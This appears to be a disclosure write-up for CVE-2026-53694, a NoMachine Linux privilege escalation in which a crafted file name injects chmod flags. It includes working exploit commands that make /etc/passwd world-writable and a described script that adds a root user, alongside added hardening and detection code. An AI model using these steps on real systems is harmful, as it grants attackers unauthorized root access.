## https://sploitus.com/exploit?id=8596479B-1EDC-5D58-82E1-664368340586
# CVE-2026-53694: NoMachine Local Privilege Escalation via Argument Injection
![CVE](https://img.shields.io/badge/CVE-2026--53694-red)
![Status](https://img.shields.io/badge/Status-Patched-brightgreen)
![Target](https://img.shields.io/badge/Target-NoMachine_Linux-blue)
![Language](https://img.shields.io/badge/Language-Python-yellow)

## Overview

This repository contains the write-up and Proof of Concept (PoC) for CVE-2026-53694, a Local Privilege Escalation (LPE) vulnerability in NoMachine for Linux.

Due to improper neutralization of argument delimiters in the `nxchmod.sh` script, a local unprivileged user can inject arguments into a system command executed as `root`. By combining this argument injection with a symbolic link, an attacker can overwrite critical system files (such as `/etc/passwd`) and escalate their privileges to root.

This vulnerability has been fully patched by the vendor.

## The Discovery Process

Finding this vulnerability was a process of trial, error, and a late-night realization. Here is how the discovery unfolded:

1. **Observing the Target:** I noticed that the `/usr/NX/scripts/restricted/nxchmod.sh` script was being executed periodically by the root user to manage permissions in specific directories.
2. **Initial Idea (The Dead End):** I saw that the script was applying `chmod a+rw` to files. I thought: *If I control the destination, can I use a symlink to make `/etc/passwd` writable?* I tested a standard symlink (`ln -s /etc/passwd /tmp/asdf`), but it failed. The Linux sticky bit on directories like `/tmp` prevents the root user from blindly following a symlink created by another user.
3. **The Breakthrough:** While reviewing the script execution later, I noticed how the command was being constructed: `${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}`. The script was taking the literal file name and passing it directly to `chmod`.
4. **Command Injection via Filename:** I realized I could create a file with spaces and flags in its name. I created a file named `X1234 -R -L`. When the script ran, the `chmod` command expanded this into arguments rather than a single file path.
5. **Bypassing the Sticky Bit:** By injecting the `-L` (follow symlinks) and `-R` (recursive) flags into the `chmod` command via the file name, I forced the `chmod` binary itself to resolve and follow the symlink I created in the directory, completely bypassing the sticky bit protection.
6. **Achieving LPE:** Once `/etc/passwd` was made writable (`a+rw`), I could simply append a new root user to the file and `su` into it.

## Technical Analysis

The vulnerability stems from how NoMachine handles permissions for X11/Wayland sockets. The script `nxchmod.sh` is spawned by the `nxserver.bin` daemon running as root.

The vulnerable execution looks like this:

```bash
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}
```

If an attacker creates a directory structure and a file named `X1234 -R -L`, the resulting command executed by root becomes:
`/bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L`

When a symlink pointing to `/etc/passwd` is placed inside the `X1234` directory, the injected `-R` and `-L` arguments force `chmod` to recursively follow the symlink and grant global read/write permissions to the target file.
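To make the root cause concrete, here is an added illustration (not NoMachine's script): `fake_chmod` is an assumed stand-in for `/bin/chmod` that only reports how a getopt-style parser would classify its argv, run once with the unquoted pattern from `nxchmod.sh` and once with a quoted, `--`-terminated form; `is_socket_name` is an assumed allow-list check for the expected `X<display>` name shape.

```shell
#!/bin/sh
# Added illustration; not NoMachine's script. fake_chmod stands in for
# /bin/chmod and only reports how many argv entries a getopt-style parser
# would treat as options versus operands (mode and paths).
fake_chmod() {
    opts=0; operands=0; end=0
    for arg in "$@"; do
        if [ "$end" -eq 0 ] && [ "$arg" = "--" ]; then
            end=1              # everything after "--" is an operand
            continue
        fi
        case "$arg" in
            -?*) if [ "$end" -eq 0 ]; then opts=$((opts + 1)); else operands=$((operands + 1)); fi ;;
            *)   operands=$((operands + 1)) ;;
        esac
    done
    printf 'options=%s operands=%s\n' "$opts" "$operands"
}

# Vulnerable pattern from nxchmod.sh: unquoted expansions undergo word
# splitting, so the name "X1234 -R -L" becomes three argv entries and the
# last two are parsed as chmod options even though they follow the path
# (GNU getopt permutes argv unless POSIXLY_CORRECT is set).
vulnerable_invoke() {
    COMMAND_CHMOD=fake_chmod; MOD_STRING="a+rw"; FILE_PATH=$1
    ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}
}

# Hardened form: quote every expansion so each variable is exactly one
# word, and end option parsing with "--" so no path can become an option.
hardened_invoke() {
    COMMAND_CHMOD=fake_chmod; MOD_STRING="a+rw"; FILE_PATH=$1
    "${COMMAND_CHMOD}" "${MOD_STRING}" -- "${FILE_PATH}"
}

# Defence in depth: act only on names of the form X<digits>, the shape of
# a real X display socket. Returns 0 when the name is acceptable.
is_socket_name() {
    rest=${1#X}
    [ "$rest" != "$1" ] && [ -n "$rest" ] && [ "${rest#*[!0-9]}" = "$rest" ]
}
```

Running `vulnerable_invoke 'X1234 -R -L'` reports two options, while `hardened_invoke` with the same name reports none and the name itself fails `is_socket_name`.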

## Requirements for Exploitation

For this exploit to work, the target system must meet the following conditions:

* The OS must be using Wayland (not X11).
* Xwayland must be active.
* A graphical session must be running (the login screen is sufficient).

## Proof of Concept

You can reproduce this vulnerability either manually using shell commands or automatically using the provided Python script.

### Method 1: Manual Execution (Shell)

Navigate to `/tmp/.X11-unix/` and execute the following commands to create the malicious directory structure.

```bash
cd /tmp/.X11-unix/

# 1. Exploitation setup
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Wait for nxchmod.sh to execute (can take up to 60 seconds).
# Verify the permissions of /etc/passwd have changed to -rw-rw-rw-
# You can now edit /etc/passwd to add a root user.
```

Once you have verified the vulnerability and escalated privileges, run the following cleanup commands to restore system stability and remove artifacts:

```bash
# 2. Cleanup
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd
```

### Method 2: Automated Exploit

A fully automated exploit is provided in `poc.py`. This script verifies the Wayland requirements, sets up the symlink, waits for the `nxchmod.sh` execution cycle, and injects a new root user (`gg`) into `/etc/passwd`.

To run the exploit:

```bash
python3 poc.py
```
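For defenders checking a host, here is an added detection helper that is not part of the original PoC or of NoMachine: `scan_x11_dir` (assumed name) sweeps the socket directory the PoC uses for the artefacts both methods leave behind, and `passwd_is_writable_by_others` (assumed name, GNU `stat`) flags the post-exploitation state of `/etc/passwd`.

```shell
#!/bin/sh
# Added detection helper, not part of the original PoC or of NoMachine.
# Sweeps an X11 socket directory for the artefacts this exploit leaves
# behind: symlinks at any depth, subdirectories (a socket directory should
# contain only sockets), and names carrying whitespace or a dash, i.e.
# anything that could expand into chmod options.
scan_x11_dir() {
    dir=${1:-/tmp/.X11-unix}      # default is the directory the PoC uses
    [ -d "$dir" ] || return 2
    find "$dir" -mindepth 1 \
        \( -type l -o -type d -o -name '* *' -o -name '*-*' \) -print
}

# Companion check for the post-exploitation state: /etc/passwd should be
# 0644; a group or other write bit set on it is a finding. Returns 0 when
# the file is writable by group or others.
passwd_is_writable_by_others() {
    f=${1:-/etc/passwd}
    mode=$(stat -c '%a' "$f" 2>/dev/null) || return 2
    case "$mode" in
        *[2367]?|*[2367]) return 0 ;;   # group or other write bit set
        *) return 1 ;;
    esac
}
```

Run `scan_x11_dir` with no argument to check the real `/tmp/.X11-unix`; any output line deserves a look, and an empty result is the expected clean state.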

## Remediation

This vulnerability has been addressed by NoMachine. Users should update to the following versions or later:

* NoMachine 9.5.7
* NoMachine 8.23.2

## Timeline

* **2026-04-20:** Vulnerability reported to vendor.
* **2026-04-23:** Vendor confirmed the vulnerability and agreed to coordinated disclosure.
* **2026-05-07:** Vendor released patched versions (9.5.7 and 8.23.2) and published Trouble Report TR04X11802.
* **2026-06-10:** CVE-2026-53694 published to NVD. The official MITRE record was still pending full analysis and credit updates as of the last check on 2026-07-01.

## References

* [NoMachine Trouble Report TR04X11802](https://kb.nomachine.com/TR04X11802)
* [NoMachine Software Update SU05X00274](https://kb.nomachine.com/SU05X00274)
* [NoMachine Software Update SU05X00275](https://kb.nomachine.com/SU05X00275)
* [NVD - CVE-2026-53694](https://nvd.nist.gov/vuln/detail/CVE-2026-53694)